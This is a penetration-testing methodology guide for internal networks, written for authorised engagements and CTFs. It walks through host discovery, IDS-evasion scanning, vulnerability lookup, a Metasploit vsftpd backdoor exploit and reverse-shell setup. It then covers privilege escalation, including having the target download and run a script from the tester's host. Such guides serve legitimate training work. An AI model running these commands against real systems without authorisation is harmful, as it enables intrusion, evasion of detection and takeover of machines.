Overview
This guide documents a repeatable five-phase methodology for internal network penetration testing engagements. Each phase builds on the previous: identify live hosts, map their attack surface, find exploitable vulnerabilities, gain access, and escalate privileges.
The cardinal rule throughout is to match your noise level to your engagement scope. A CTF has no OPSEC requirements. A red team engagement inside an enterprise network does.
Phase 1: Host Discovery
The goal of this phase is to answer a single question: who is online? Before targeting any specific machine, identify all active IP addresses in the subnet.
Identify Your Network Range
Start by finding your own IP address and subnet mask so you know what range to scan.
ip addr show | grep 'inet'
Look for the CIDR notation in the output, for example 192.168.1.42/24. The /24 tells you the subnet spans 192.168.1.0 to 192.168.1.255.
Passive Scanning (OPSEC Safe)
The preferred method for red team operations. Listen to ARP traffic without sending any packets yourself.
sudo netdiscover -p
This is completely silent because it only observes broadcast traffic that already exists on the network. The tradeoff is speed: you only see hosts that are actively communicating.
Active Scanning (Fast and Noisy)
Sends ARP requests to force all hosts in the range to respond. Appropriate when time is limited and noise is acceptable.
# nmap ping scan
nmap -sn 192.168.1.0/24
# netdiscover active mode
sudo netdiscover -r 192.168.1.0/24
The -sn flag disables port scanning so nmap only checks whether hosts are alive.
Living Off the Land
If you cannot install tools, check the local ARP cache using OS built-ins. This only shows devices your machine has already communicated with, so coverage is limited.
arp -a
ip neigh
OPSEC Tactics for Enterprise Networks
Generating a sudden burst of ARP or ICMP traffic across a large subnet creates a noise spike that triggers IDS and IPS alerts. Apply these techniques to stay below the detection threshold.
IP Slicing: Scan small chunks of 10 to 20 IPs rather than the entire range at once.
nmap -sn 192.168.1.10-25
Timing Control: Use polite mode to slow the scan down and blend it into normal traffic patterns.
nmap -sn -T2 192.168.1.0/24
Host Randomization: Security devices look for sequential patterns like .1, .2, .3. Randomizing the scan order makes it harder to fingerprint as a sweep.
nmap -sn --randomize-hosts 192.168.1.0/24
Phase 2: Port Scanning and Service Enumeration
You now have a list of live hosts. The goal of this phase is to map the attack surface of each target: which ports are open, and what software versions are running on them.
Stealth Scan (Start Here)
A TCP SYN scan is faster and less detectable than a full connect scan because it does not complete the three-way handshake.
sudo nmap -sS -p- --min-rate 1000 <TARGET_IP>
-sS requires root or sudo. -p- scans all 65,535 ports, which is critical because services are frequently running on non-standard ports. --min-rate 1000 sets a floor of 1,000 packets per second. Lower this on unstable networks.
Service Version and OS Detection
Once you know which ports are open, interrogate them to identify exact software versions and the operating system.
nmap -sV -sC -O -p 22,80,445 <TARGET_IP>
-sV detects service versions such as Apache 2.4.41 rather than just http. -sC runs the default NSE scripts, which safely extract information like page titles and SSH host keys. -O detects the operating system. Pass only the ports found in the previous step to reduce noise and scan time.
Aggressive Scan for CTFs
Use this only in CTF environments or when stealth is not a concern. It combines version detection, scripts, OS fingerprinting, and traceroute into one command.
nmap -A <TARGET_IP>
Dealing With Filtered Ports
If many ports show as Filtered, a firewall is dropping your packets. Try packet fragmentation or spoofing the source port as a commonly trusted service.
nmap -sS -f <TARGET_IP>
nmap -sS --source-port 53 <TARGET_IP>
Using source port 53 (DNS) sometimes bypasses rules that allow DNS traffic through.
High Value Ports Reference
These services are frequent entry points. Prioritize them during enumeration.
| Port | Service | Attack Vector |
|---|---|---|
| 21 | FTP | Anonymous login, cleartext credentials |
| 22 | SSH | Brute-force, weak or reused keys |
| 23 | Telnet | Legacy service, credentials sent in plaintext |
| 445 | SMB | EternalBlue (MS17-010), RCE without authentication |
| 3389 | RDP | GUI access via brute-force or credential reuse |
| 3306 | MySQL | Database injection, credential dumping |
| 80/443 | HTTP/S | Web application vulnerabilities: SQLi, XSS, RCE |
Phase 3: Vulnerability Analysis
You have software versions from Phase 2. The goal here is to determine whether any of them are known to be exploitable.
Automated NSE Vulnerability Scan
Nmap's scripting engine includes a category of vulnerability detection scripts that check targets against known signatures.
nmap --script vuln -p <OPEN_PORTS> <TARGET_IP>
If a target is running a vulnerable service, the output will indicate it explicitly, for example VULNERABLE: ms17-010.
Searchsploit (Offline ExploitDB)
When Nmap gives you a specific version string like vsftpd 2.3.4, cross-reference it against the local ExploitDB database on Kali.
searchsploit vsftpd 2.3.4
If a match exists, copy the exploit code to your working directory.
searchsploit -m <EXPLOIT_ID>
Online Research
The local database is sometimes outdated. Use Google to find recent exploits and CVE write-ups.
<Service Name> <Version> exploit github
<Service Name> <Version> CVE
Example query: Apache 2.4.49 path traversal exploit github
A scanner reporting a service as vulnerable does not guarantee the exploit will work. Patched backports are common: the version string looks old but a security patch has been applied at the package level. Always verify before launching an exploit.
Phase 4: Exploitation
The goal is to weaponize the confirmed vulnerability and obtain shell access on the target.
Metasploit Framework
The fastest path to exploitation for known CVEs. Appropriate for CTFs and engagements where noise is not a concern.
msfconsole
search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS <TARGET_IP>
set LHOST <YOUR_IP>
exploit
Manual Exploitation
Required for the OSCP exam and any engagement where Metasploit is restricted. Use scripts found via searchsploit or GitHub.
python3 exploit.py <TARGET_IP> <TARGET_PORT>
Always read the exploit code before running it. Understand what it does, what it requires, and what it writes to disk.
Reverse Shell vs Bind Shell
This is the most important concept to understand before running any exploit.
A reverse shell makes the target connect back to your machine. This is almost always the correct choice because firewalls typically block inbound connections but allow outbound ones.
# On your machine, start a listener
nc -lvnp 4444
Configure your payload to connect to your IP on port 4444.
A bind shell opens a listening port on the target that you then connect to. This is useful when the target cannot reach your machine, but it is frequently blocked by host-based firewalls on the target.
Avoid running exploits against production systems without prior testing in an equivalent lab environment. A bad buffer overflow can crash the service or trigger a kernel panic.
Phase 5: Privilege Escalation
You have a low-privilege shell, likely as www-data or a similar service account. The goal is to reach root (Linux) or SYSTEM (Windows).
Step 1: Stabilize the Shell
An unstable shell from an exploit will not handle signals correctly. Pressing Ctrl+C kills the connection. Fix this before doing anything else.
python3 -c 'import pty; pty.spawn("/bin/bash")'
Step 2: Automated Enumeration with LinPEAS
LinPEAS scans the system for hundreds of known privilege escalation vectors and color-codes results by probability. Items in red or yellow represent the highest-confidence findings.
Host the script from your machine:
python3 -m http.server 80
Download and execute it on the target:
wget http://<YOUR_IP>/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
Step 3: Manual Checks
If automated tools are unavailable or their output is noisy, these three checks cover the most common escalation paths.
Sudo Rights: Check which commands the current user can run as root without a password.
sudo -l
If the output shows something like (root) NOPASSWD: /usr/bin/vim, that binary can be used to spawn a root shell. Look up the binary on GTFOBins for the exact command.
SUID Binaries: These files run with the permissions of their owner, typically root, regardless of who executes them.
find / -perm -u=s -type f 2>/dev/null
Look for common binaries with the SUID bit set: find, bash, nmap, python. GTFOBins documents how to exploit each one.
Kernel Version: If the system is running an old kernel, check for known exploits.
uname -a
Search searchsploit linux kernel <version> for matching exploits. Dirty COW (CVE-2016-5195) is a well-known example targeting kernels below 4.8.3.
Kernel exploits are a last resort. They can cause a kernel panic and crash the server entirely. Always exhaust sudo misconfiguration and SUID binary paths before attempting a kernel exploit.
Essential References
GTFOBins: A curated list of Unix binaries that can be used to bypass security restrictions, spawn shells, and escalate privileges in misconfigured environments.
https://gtfobins.github.io
ExploitDB: A public archive of exploit code maintained by Offensive Security, searchable by service name, version, and CVE.
https://www.exploit-db.com
HackTricks: Community-maintained documentation for penetration testing techniques across every platform and protocol.
https://book.hacktricks.xyz